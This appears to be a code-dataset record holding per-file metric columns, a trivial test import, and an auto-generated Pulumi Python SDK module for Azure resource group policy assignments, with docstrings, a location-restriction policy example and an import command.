| 0.333333
| 0.611111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 87
| 3
| 63
| 29
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d4ce83666196f38366d803aa20c42127c5243158
| 32
|
py
|
Python
|
tests/test_foocat_tb.py
|
TBarasch/foocat_tb
|
3b64dbb374fdfe6c8f8a640ae4dd44f61fb6b45c
|
[
"MIT"
] | null | null | null |
tests/test_foocat_tb.py
|
TBarasch/foocat_tb
|
3b64dbb374fdfe6c8f8a640ae4dd44f61fb6b45c
|
[
"MIT"
] | null | null | null |
tests/test_foocat_tb.py
|
TBarasch/foocat_tb
|
3b64dbb374fdfe6c8f8a640ae4dd44f61fb6b45c
|
[
"MIT"
] | null | null | null |
from foocat_tb import foocat_tb
| 16
| 31
| 0.875
| 6
| 32
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 32
| 1
| 32
| 32
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d4cf0d367e1f33008e30c9aa47e8551212e14de0
| 36,579
|
py
|
Python
|
sdk/python/pulumi_azure/core/resource_group_policy_assignment.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/core/resource_group_policy_assignment.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/core/resource_group_policy_assignment.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ResourceGroupPolicyAssignmentArgs', 'ResourceGroupPolicyAssignment']
@pulumi.input_type
class ResourceGroupPolicyAssignmentArgs:
def __init__(__self__, *,
policy_definition_id: pulumi.Input[str],
resource_group_id: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ResourceGroupPolicyAssignment resource.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies if this Policy should be enforced or not?
:param pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs'] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
"""
pulumi.set(__self__, "policy_definition_id", policy_definition_id)
pulumi.set(__self__, "resource_group_id", resource_group_id)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if enforce is not None:
pulumi.set(__self__, "enforce", enforce)
if identity is not None:
pulumi.set(__self__, "identity", identity)
if location is not None:
pulumi.set(__self__, "location", location)
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if name is not None:
pulumi.set(__self__, "name", name)
if non_compliance_messages is not None:
pulumi.set(__self__, "non_compliance_messages", non_compliance_messages)
if not_scopes is not None:
pulumi.set(__self__, "not_scopes", not_scopes)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="policyDefinitionId")
def policy_definition_id(self) -> pulumi.Input[str]:
"""
The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "policy_definition_id")
@policy_definition_id.setter
def policy_definition_id(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_definition_id", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Input[str]:
"""
The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description which should be used for this Policy Assignment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The Display Name for this Policy Assignment.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def enforce(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if this Policy should be enforced or not?
"""
return pulumi.get(self, "enforce")
@enforce.setter
def enforce(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enforce", value)
@property
@pulumi.getter
def identity(self) -> Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@identity.setter
def identity(self, value: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]):
pulumi.set(self, "identity", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Metadata for this Policy.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nonComplianceMessages")
def non_compliance_messages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]:
"""
One or more `non_compliance_message` blocks as defined below.
"""
return pulumi.get(self, "non_compliance_messages")
@non_compliance_messages.setter
def non_compliance_messages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]):
pulumi.set(self, "non_compliance_messages", value)
@property
@pulumi.getter(name="notScopes")
def not_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
"""
return pulumi.get(self, "not_scopes")
@not_scopes.setter
def not_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "not_scopes", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class _ResourceGroupPolicyAssignmentState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ResourceGroupPolicyAssignment resources.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies if this Policy should be enforced or not?
:param pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs'] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if enforce is not None:
pulumi.set(__self__, "enforce", enforce)
if identity is not None:
pulumi.set(__self__, "identity", identity)
if location is not None:
pulumi.set(__self__, "location", location)
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if name is not None:
pulumi.set(__self__, "name", name)
if non_compliance_messages is not None:
pulumi.set(__self__, "non_compliance_messages", non_compliance_messages)
if not_scopes is not None:
pulumi.set(__self__, "not_scopes", not_scopes)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if policy_definition_id is not None:
pulumi.set(__self__, "policy_definition_id", policy_definition_id)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description which should be used for this Policy Assignment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The Display Name for this Policy Assignment.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def enforce(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if this Policy should be enforced or not?
"""
return pulumi.get(self, "enforce")
@enforce.setter
def enforce(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enforce", value)
@property
@pulumi.getter
def identity(self) -> Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@identity.setter
def identity(self, value: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]):
pulumi.set(self, "identity", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Metadata for this Policy.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nonComplianceMessages")
def non_compliance_messages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]:
"""
One or more `non_compliance_message` blocks as defined below.
"""
return pulumi.get(self, "non_compliance_messages")
@non_compliance_messages.setter
def non_compliance_messages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]):
pulumi.set(self, "non_compliance_messages", value)
@property
@pulumi.getter(name="notScopes")
def not_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
"""
return pulumi.get(self, "not_scopes")
@not_scopes.setter
def not_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "not_scopes", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="policyDefinitionId")
def policy_definition_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "policy_definition_id")
@policy_definition_id.setter
def policy_definition_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_definition_id", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
class ResourceGroupPolicyAssignment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Resource Group Policy Assignment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_definition = azure.policy.Definition("exampleDefinition",
policy_type="Custom",
mode="All",
policy_rule=\"\"\" {
"if": {
"not": {
"field": "location",
"equals": "westeurope"
}
},
"then": {
"effect": "Deny"
}
}
\"\"\")
example_resource_group_policy_assignment = azure.core.ResourceGroupPolicyAssignment("exampleResourceGroupPolicyAssignment",
resource_group_id=example_resource_group.id,
policy_definition_id=example_definition.id,
parameters=\"\"\" "tagName": {
"value": "Business Unit"
},
"tagValue": {
"value": "BU"
}
\"\"\")
```
## Import
Resource Group Policy Assignments can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:core/resourceGroupPolicyAssignment:ResourceGroupPolicyAssignment example /subscriptions/00000000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Authorization/policyAssignments/assignment1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies if this Policy should be enforced or not?
:param pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ResourceGroupPolicyAssignmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Resource Group Policy Assignment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_definition = azure.policy.Definition("exampleDefinition",
policy_type="Custom",
mode="All",
policy_rule=\"\"\" {
"if": {
"not": {
"field": "location",
"equals": "westeurope"
}
},
"then": {
"effect": "Deny"
}
}
\"\"\")
example_resource_group_policy_assignment = azure.core.ResourceGroupPolicyAssignment("exampleResourceGroupPolicyAssignment",
resource_group_id=example_resource_group.id,
policy_definition_id=example_definition.id,
parameters=\"\"\" "tagName": {
"value": "Business Unit"
},
"tagValue": {
"value": "BU"
}
\"\"\")
```
## Import
Resource Group Policy Assignments can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:core/resourceGroupPolicyAssignment:ResourceGroupPolicyAssignment example /subscriptions/00000000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Authorization/policyAssignments/assignment1
```
:param str resource_name: The name of the resource.
:param ResourceGroupPolicyAssignmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResourceGroupPolicyAssignmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResourceGroupPolicyAssignmentArgs.__new__(ResourceGroupPolicyAssignmentArgs)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["enforce"] = enforce
__props__.__dict__["identity"] = identity
__props__.__dict__["location"] = location
__props__.__dict__["metadata"] = metadata
__props__.__dict__["name"] = name
__props__.__dict__["non_compliance_messages"] = non_compliance_messages
__props__.__dict__["not_scopes"] = not_scopes
__props__.__dict__["parameters"] = parameters
if policy_definition_id is None and not opts.urn:
raise TypeError("Missing required property 'policy_definition_id'")
__props__.__dict__["policy_definition_id"] = policy_definition_id
if resource_group_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_id'")
__props__.__dict__["resource_group_id"] = resource_group_id
super(ResourceGroupPolicyAssignment, __self__).__init__(
'azure:core/resourceGroupPolicyAssignment:ResourceGroupPolicyAssignment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None) -> 'ResourceGroupPolicyAssignment':
"""
Get an existing ResourceGroupPolicyAssignment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies whether this Policy should be enforced.
:param pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Resource Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Resource Group Policy Assignment to be created.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
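## Example Usage
A minimal lookup sketch (the resource ID below is a placeholder):
```python
import pulumi_azure as azure
existing = azure.core.ResourceGroupPolicyAssignment.get("existingAssignment",
    id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Authorization/policyAssignments/assignment1")
```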
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ResourceGroupPolicyAssignmentState.__new__(_ResourceGroupPolicyAssignmentState)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["enforce"] = enforce
__props__.__dict__["identity"] = identity
__props__.__dict__["location"] = location
__props__.__dict__["metadata"] = metadata
__props__.__dict__["name"] = name
__props__.__dict__["non_compliance_messages"] = non_compliance_messages
__props__.__dict__["not_scopes"] = not_scopes
__props__.__dict__["parameters"] = parameters
__props__.__dict__["policy_definition_id"] = policy_definition_id
__props__.__dict__["resource_group_id"] = resource_group_id
return ResourceGroupPolicyAssignment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description which should be used for this Policy Assignment.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
The Display Name for this Policy Assignment.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def enforce(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether this Policy should be enforced.
"""
return pulumi.get(self, "enforce")
@property
@pulumi.getter
def identity(self) -> pulumi.Output[Optional['outputs.ResourceGroupPolicyAssignmentIdentity']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def metadata(self) -> pulumi.Output[str]:
"""
A JSON mapping of any Metadata for this Policy.
"""
return pulumi.get(self, "metadata")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nonComplianceMessages")
def non_compliance_messages(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceGroupPolicyAssignmentNonComplianceMessage']]]:
"""
One or more `non_compliance_message` blocks as defined below.
"""
return pulumi.get(self, "non_compliance_messages")
@property
@pulumi.getter(name="notScopes")
def not_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Resource Group which are excluded from this Policy.
"""
return pulumi.get(self, "not_scopes")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[str]]:
"""
A JSON mapping of any Parameters for this Policy. Changing this forces a new Resource Group Policy Assignment to be created.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="policyDefinitionId")
def policy_definition_id(self) -> pulumi.Output[str]:
"""
The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "policy_definition_id")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[str]:
"""
The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "resource_group_id")
avg_line_length: 48.577689 | max_line_length: 236 | alphanum_fraction: 0.669127
qsc_code_num_words: 4,095 | qsc_code_num_chars: 36,579 | qsc_code_mean_word_length: 5.797802 | qsc_code_frac_words_unique: 0.05348
qsc_code_frac_chars_top_2grams: 0.086176 | top_3grams: 0.070171 | top_4grams: 0.061157
